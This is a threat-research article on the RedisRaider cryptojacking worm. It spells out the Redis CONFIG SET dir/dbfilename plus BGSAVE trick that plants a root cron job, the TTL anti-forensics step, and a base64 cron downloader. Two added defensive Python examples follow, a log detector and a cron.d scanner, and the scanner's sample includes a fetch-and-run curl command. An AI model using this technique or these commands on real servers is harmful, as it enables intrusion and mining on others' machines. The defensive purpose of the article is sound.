A new sophisticated Linux cryptojacking campaign called RedisRaider has emerged, targeting vulnerable Redis servers across the internet.
This aggressive malware exploits misconfigured Redis instances to deploy cryptocurrency mining software, effectively turning compromised systems into digital mining farms for the attackers.
RedisRaider employs worm-like capabilities, continuously scanning across randomized portions of the IPv4 space to identify additional vulnerable targets, creating a self-propagating network of infected systems.
The attack vector is particularly concerning because it relies on legitimate Redis configuration commands rather than on a software vulnerability: there is nothing to patch. By targeting publicly reachable Redis instances that run without authentication or network access controls, the attackers use CONFIG SET to redirect where Redis writes its database dump, and from there obtain command execution on the underlying Linux host. Redis 3.2 and later ship with protected mode, which refuses connections from non-loopback clients when no password and no bind address are configured, so the instances hit here are ones where that default was switched off or the service was deliberately bound to a public interface.
Once access is gained, the malware deploys a fork of the popular XMRig miner to generate Monero cryptocurrency for the attackers, consuming significant computational resources from victim systems.
Datadog Security Labs researchers identified the campaign through their monitoring systems, noting unusual patterns of Redis configuration abuse appearing across multiple client environments.
The security team observed the malware’s unique persistence mechanisms and obfuscation techniques, which demonstrate considerable sophistication beyond typical opportunistic cryptojacking operations.
The impact of RedisRaider extends beyond resource theft, as the malware modifies system configurations and maintains persistence through cron jobs.
The attackers have implemented a multi-pronged approach to revenue generation, hosting not only server-side cryptojacking payloads but also web-based Monero miners on related infrastructure.
This indicates a coordinated effort by threat actors with experience in malware development and knowledge of Redis, Go programming, and Linux internals.
The attackers also employ a subtle anti-forensics measure: the key written to Redis is given a time-to-live (TTL) of just 120 seconds, so it expires from the keyspace shortly after the dump has been written, and a responder who inspects the instance later finds no trace of the cron entry in Redis itself.
These techniques suggest an evolution in cryptojacking tactics, moving from crude approaches to more sophisticated operations designed to maximize profits while minimizing detection.
Infection Mechanism Through Redis Configuration Manipulation
RedisRaider’s infection process begins by scanning for Redis instances exposed on the default port 6379. On finding a candidate, the malware issues the INFO command and checks the os field of its server section to confirm that the Redis server is running on Linux. If it is, exploitation begins with Redis’s SET command, which stores under a key a single cron entry whose command decodes and runs an embedded base64-encoded shell script:
set t "*/1 * * * * root sh -c 'echo dT0iaHR0cDovL2EuaGJ3ZWIuaWN10jgwODAvdXBsb2Fkcy8y
The malware then retargets Redis’s own persistence with three commands, so that the next dump lands in the cron directory:
config set dir "/etc/cron.d"
config set dbfilename "apache"
bgsave
This writes the RDB snapshot to /etc/cron.d/apache. Most of that file is binary RDB framing, but cron reads it line by line, logs and skips the lines it cannot parse, and runs the one well-formed entry; because /etc/cron.d entries carry a user field, the embedded job runs every minute as root. Two conditions have to hold for this to work: Redis must be running with enough privilege to write into /etc/cron.d (cron refuses system crontab files that are not owned by root), and the stored value has to be separated from the binary framing by newlines so that cron sees the entry as a line of its own, which is why this technique is normally used with leading and trailing newlines around the crontab text. Note also that the changed dir and dbfilename settings stay in effect in the running instance, so CONFIG GET dir on a suspect server is a quick indicator after the fact.
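Since the three-command sequence is the one reliable signal of this technique, it is worth watching for on the Redis side. The following is an added example, not code from the article or from Datadog: a small detector over Redis MONITOR output that tracks, per client connection, a CONFIG SET dir pointing into a sensitive directory followed by CONFIG SET dbfilename and a BGSAVE or SAVE within a time window. The MONITOR lines, the directory list and the 120-second window are constructed for the example, and the client addresses are documentation ranges.

```python
"""Detect the CONFIG SET dir / CONFIG SET dbfilename / BGSAVE dump hijack in Redis MONITOR output.

Added example for illustration; not the article's or Datadog's code. Sample data is constructed.
"""
import os
import re
import shlex
from collections import defaultdict

# One MONITOR line looks like:
#   1747000000.201000 [0 203.0.113.7:41522] "CONFIG" "SET" "dir" "/etc/cron.d"
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')

# Directories a dump only ever lands in when someone is abusing CONFIG SET.
# Constructed list for this example; extend it for your own environment.
SENSITIVE_DIRS = ("/etc/cron.d", "/etc/cron.hourly", "/var/spool/cron", "/root/.ssh", "/var/www")

WINDOW_SECONDS = 120.0   # assumed window; the three commands arrive within seconds in practice


def parse_monitor_line(line):
    """Return (timestamp, client, args) for a MONITOR line, or None if it is not one."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    try:
        args = shlex.split(m.group("args"))   # MONITOR double-quotes every argument
    except ValueError:
        return None
    return (float(m.group("ts")), m.group("client"), args) if args else None


def in_sensitive_dir(path):
    """True when `path` is one of SENSITIVE_DIRS or lies beneath one."""
    p = os.path.normpath(path)
    return any(p == d or p.startswith(d + "/") for d in SENSITIVE_DIRS)


def detect_dump_hijack(lines, window=WINDOW_SECONDS):
    """Return one alert per client that pointed the dump at a sensitive directory
    and then forced a save within `window` seconds. Command names are case-insensitive."""
    pending = defaultdict(dict)   # client -> {"dir": (ts, value), "dbfilename": (ts, value)}
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, args = parsed
        cmd = args[0].lower()
        sub = args[1].lower() if len(args) > 1 else ""
        if cmd == "config" and sub == "set" and len(args) >= 4:
            param = args[2].lower()
            if param in ("dir", "dbfilename"):
                pending[client][param] = (ts, args[3])
        elif cmd in ("bgsave", "save"):
            st = pending.get(client, {})
            if "dir" in st and "dbfilename" in st:
                dir_ts, directory = st["dir"]
                name_ts, filename = st["dbfilename"]
                if ts - min(dir_ts, name_ts) <= window and in_sensitive_dir(directory):
                    alerts.append({
                        "client": client,
                        "ts": ts,
                        "target": os.path.join(os.path.normpath(directory), filename),
                    })
            pending.pop(client, None)   # a save ends the sequence either way
    return alerts


# Constructed MONITOR excerpt: one attacker session (203.0.113.7) that follows the
# RedisRaider sequence and one operator (10.0.0.12) who legitimately forces a save.
SAMPLE_MONITOR = """\
1747000000.101000 [0 203.0.113.7:41522] "INFO"
1747000000.152000 [0 203.0.113.7:41522] "set" "t" "*/1 * * * * root sh -c 'echo aWQ= | base64 -d | sh'"
1747000000.201000 [0 203.0.113.7:41522] "config" "set" "dir" "/etc/cron.d"
1747000000.233000 [0 203.0.113.7:41522] "config" "set" "dbfilename" "apache"
1747000000.260000 [0 203.0.113.7:41522] "bgsave"
1747000005.000000 [0 10.0.0.12:55100] "CONFIG" "SET" "dir" "/var/lib/redis"
1747000005.100000 [0 10.0.0.12:55100] "CONFIG" "SET" "dbfilename" "dump.rdb"
1747000005.200000 [0 10.0.0.12:55100] "BGSAVE"
"""

if __name__ == "__main__":
    for a in detect_dump_hijack(SAMPLE_MONITOR.splitlines()):
        print(f"ALERT {a['client']} redirected the RDB dump to {a['target']} at {a['ts']:.3f}")
```

In production the lines come from redis-cli monitor (which has a measurable cost on a busy instance) or from a proxy that logs commands; the stateful part is the same. Prevention is cheaper than detection here: requirepass or ACLs, bind to a private interface, and, on versions without ACLs, rename-command CONFIG to an unguessable name or to the empty string.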
When decoded, the script downloads the main RedisRaider payload from the attacker’s infrastructure to /tmp/mysql, marks it executable, and launches it in the background under nohup so that it keeps running after the cron-spawned shell exits. Shipping the script as a base64 blob piped through base64 -d keeps the download URL out of the plain-text cron line and avoids the quoting problems a multi-command script would otherwise cause inside a crontab entry.
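On the host side the artefact is a cron.d file that is mostly binary. The following is an added example, again not the article’s or Datadog’s code: it builds a constructed approximation of such a hijacked dump (RDB header, one string key, zeroed checksum trailer) and then scans it the way a responder would scan /etc/cron.d, pulling out every line that parses as a cron.d entry, flagging the file as RDB-wrapped, and decoding the echo | base64 -d payload. The downloader script, its URL and the RDB builder are constructed stand-ins; only the /tmp/mysql path comes from the article.

```python
"""Find and decode cron.d entries hidden inside a Redis RDB dump.

Added example for illustration; not the article's or Datadog's code. Sample data is constructed.
"""
import base64
import binascii
import re

# A /etc/cron.d-style entry: five numeric schedule fields, a user, then the command.
# (Named months/weekdays are not handled; constructed scope for this example.)
CRON_D_LINE = re.compile(
    rb"^(?:(?:\*|\d+)(?:[/,\-]\d+)*\s+){5}(?P<user>[A-Za-z_][A-Za-z0-9_-]*)\s+(?P<cmd>.+)$"
)
# The "echo <base64> | base64 -d" idiom used to smuggle a whole script into one cron line.
B64_ECHO = re.compile(rb"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)")
RDB_MAGIC = b"REDIS"


def scan_cron_file(data):
    """Return every parseable cron.d entry in `data`, flagging RDB framing and
    decoding any base64 payload the command line carries."""
    findings = []
    for raw in data.split(b"\n"):
        m = CRON_D_LINE.match(raw.strip())
        if not m:
            continue                      # binary RDB framing, blank lines and comments end up here
        cmd = m.group("cmd")
        decoded = []
        for blob in B64_ECHO.findall(cmd):
            try:
                decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
            except binascii.Error:
                decoded.append("<undecodable base64>")
        findings.append({
            "rdb_wrapped": data.startswith(RDB_MAGIC),
            "user": m.group("user").decode(),
            "command": cmd.decode("utf-8", "replace"),
            "decoded": decoded,
        })
    return findings


def _rdb_len(n):
    """RDB length prefix: 6-bit form below 64, 14-bit form below 16384 (enough for this sample)."""
    if n < 64:
        return bytes([n])
    if n < 16384:
        return bytes([0x40 | (n >> 8), n & 0xFF])
    raise ValueError("sample builder only handles short strings")


def build_hijacked_dump(cron_line):
    """Constructed approximation of what BGSAVE leaves in /etc/cron.d when the only key
    is "t" holding `cron_line`. A real dump ends with a valid CRC64; this one is zeroed."""
    value = b"\n\n" + cron_line + b"\n\n"   # newlines isolate the entry from the binary framing
    out = b"REDIS0011"                                                     # magic + RDB version
    out += b"\xfa" + _rdb_len(9) + b"redis-ver" + _rdb_len(5) + b"7.2.4"  # AUX field
    out += b"\xfe\x00"                                                     # SELECTDB 0
    out += b"\xfb\x01\x00"                                                 # RESIZEDB: 1 key, 0 expires
    out += b"\x00" + _rdb_len(1) + b"t" + _rdb_len(len(value)) + value     # STRING key "t"
    out += b"\xff" + b"\x00" * 8                                           # EOF + zeroed checksum
    return out


# Constructed stand-in for the downloader the article describes: fetch to /tmp/mysql,
# make it executable, detach it with nohup. The URL is a documentation address.
SAMPLE_SCRIPT = (b'u="http://203.0.113.7:8080/payload"; curl -fsSL "$u" -o /tmp/mysql; '
                 b'chmod +x /tmp/mysql; nohup /tmp/mysql >/dev/null 2>&1 &')
SAMPLE_CRON_LINE = (b"*/1 * * * * root sh -c 'echo " + base64.b64encode(SAMPLE_SCRIPT)
                    + b" | base64 -d | sh'")

if __name__ == "__main__":
    for f in scan_cron_file(build_hijacked_dump(SAMPLE_CRON_LINE)):
        flag = "RDB-WRAPPED " if f["rdb_wrapped"] else ""
        print(f"{flag}cron entry as {f['user']}: {f['command'][:60]}...")
        for script in f["decoded"]:
            print("  decoded payload:", script)
```

Run scan_cron_file over every file in /etc/cron.d and the per-user spool during triage; any hit with rdb_wrapped set is conclusive, and a decoded payload gives you the download URL and drop path without executing anything.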
The primary payload is heavily obfuscated using Garble, a compile-time obfuscator for Go.
It contains an embedded, packed version of the XMRig cryptocurrency miner which it unpacks at runtime, establishing a connection to mining pools to generate revenue for the attackers while continuously scanning for and infecting additional vulnerable Redis servers.